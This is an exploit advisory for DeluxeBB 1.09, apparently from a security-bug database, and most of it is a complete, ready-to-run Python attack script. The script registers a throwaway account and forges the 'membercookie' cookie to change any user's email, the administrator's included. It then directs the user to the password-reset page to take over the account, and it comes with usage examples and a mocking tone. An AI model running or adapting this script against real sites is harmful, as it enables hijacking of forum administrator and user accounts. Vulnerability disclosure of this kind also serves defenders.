DeluxeBB E-Mail Address Change Security Bypass

Advisory Content :

http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21

###################################################

DeluxeBB E-Mail Address Change Security Bypass

Crediti: Nexen

Applicazione: DeluxeBB

Versione: 1.09

Impatto: Security Bypass

Rischio: [3/5]

Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ __ _____ _____ _ __

| '_ / _ / / _ '_ | | | | __/> < __/ | | |

|_| |_|___/_/____|_| |_|

------------------------------------------------------------------------
------------------------

§ DeluxeBB 0day Remote Change Admin's credentials §

------------------------------------------------------------------------
------------------------

nexen

------------------------------------------------------------------------
------------------------

PoC / Bug Explanation:

When you update your profile,

DeluxeBB execute a vulnerable query:

$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail',
msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");

So, editing cookie "membercookie" you can change remote user's email.

Enjoy ;)

------------------------------------------------------------------------
------------------------

'''

import httplib, urllib, sys, md5

from random import randint

print
"n#####################################################################
###################"

print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "

print " "

print " Vulnerability Discovered By Nexen "

print " Greetz to The:Paradox that Coded the Exploit. "

print " "

print " Usage: "

print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " %
(sys.argv[0])

print " "

print " Additional Flags: "

print " -id34 -passMypassword -port80 "

print " "

print " Example: "

print " python %s 127.0.0.1 admin /DeluxeBB/ me (at) it (dot) com [email
concealed] -port81 " % (sys.argv[0])

print " "

print
"#######################################################################
#################n"

if len(sys.argv)<=4: sys.exit()

else: print "[.]Exploit Starting."

target = sys.argv[1]

admin_nick = sys.argv[2]

path = sys.argv[3]

real_email = sys.argv[4]

botpass = "the-new-administrator"

rand = randint(1, 99999)

dn1 = 0

dn2 = 0

dn3 = 0

try:

for line in sys.argv[:]:

if line.find('-pass') != -1 and dn1 == 0:

upass = line.split('-pass')[1]

dn1 = 1

elif line.find('-pass') == -1 and dn1 == 0:

upass = ""

if line.find('-id') != -1 and dn2 == 0:

userid = line.split('-id')[1]

dn2 = 1

elif line.find('-id') == -1 and dn2 == 0:

userid = ""

if line.find('-port') != -1 and dn3 == 0:

port = line.split('-port')[1]

dn3 = 1

elif line.find('-port') == -1 and dn3 == 0:

port = "80"

except:

sys.exit("[-]Some error in Additional Flag.")

if upass=="" and userid != "" or userid == "" and upass != "":

print "[-]Bad Additional flags -id -pass given, ignoring them."

upass=""

userid=""

########################################################################
####################Trying to connect.

try:

conn = httplib.HTTPConnection(target,port)

conn.request("GET", "")

except: sys.exit("[-]Cannot connect. Check Target.")

########################################################################
####################Registering a new user if id or upass not defined

try:

conn = httplib.HTTPConnection(target,port)

if upass == "" or userid == "":

conn.request("POST", path + "misc.php?sub=register",
urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) ,
'pass': botpass,'pass2': botpass,'email': 'root%d (at) yoursystemgotpowned
(dot) it [email concealed]' % (rand) }), {"Accept":
"text/plain","Content-type": "application/x-www-form-urlencoded"})

response = conn.getresponse()

cookies = response.getheader('set-cookie').split(";")

#print "nnth331337.%d nnthe-new-administrator" % (rand)

print "[.]Registering a new user. -->",response.status, response.reason

conn.close()

########################################################################
####################Getting memberid in Cookies

for line in cookies[:]:

if line.find('memberid') != -1:

mid = line.split('memberid=')[1]

########################################################################
####################Isset like starts

try: mid

except NameError: sys.exit("[-]Can't Get "memberid". Failed. Something has
gone wrong. If you have not done yet, you may have to register manually and
use flags -id -pass")

except AttributeError:

sys.exit("[-]AttributeError Check your Target/path.")

########################################################################
####################Doing some Md5

if upass=="" or userid=="":

hash = md5.new()

hash.update(botpass)

passmd5 = hash.hexdigest()

else:

hash = md5.new()

hash.update(upass)

passmd5 = hash.hexdigest()

mid = userid

########################################################################
####################Updating "victim" email in Profile

conn = httplib.HTTPConnection(target,port)

conn.request("POST", path+"cp.php?sub=settings",
urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept":
"text/plain","Cookie": "memberid="+mid+";
membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type":
"application/x-www-form-urlencoded"})

response = conn.getresponse()

print "[.]Changing ""+admin_nick+"" Email With "" + real_email + ""
-->",response.status, response.reason

conn.close()

print "[+]All Done! Email changed!!!nn You can reset ""+admin_nick+""
password here -> "+target+path+"misc.php?sub=lostpw :Dnn Have Fun =)n"

Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per
aggiungere questa informazione.

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

DeluxeBB E-Mail Address Change Security Bypass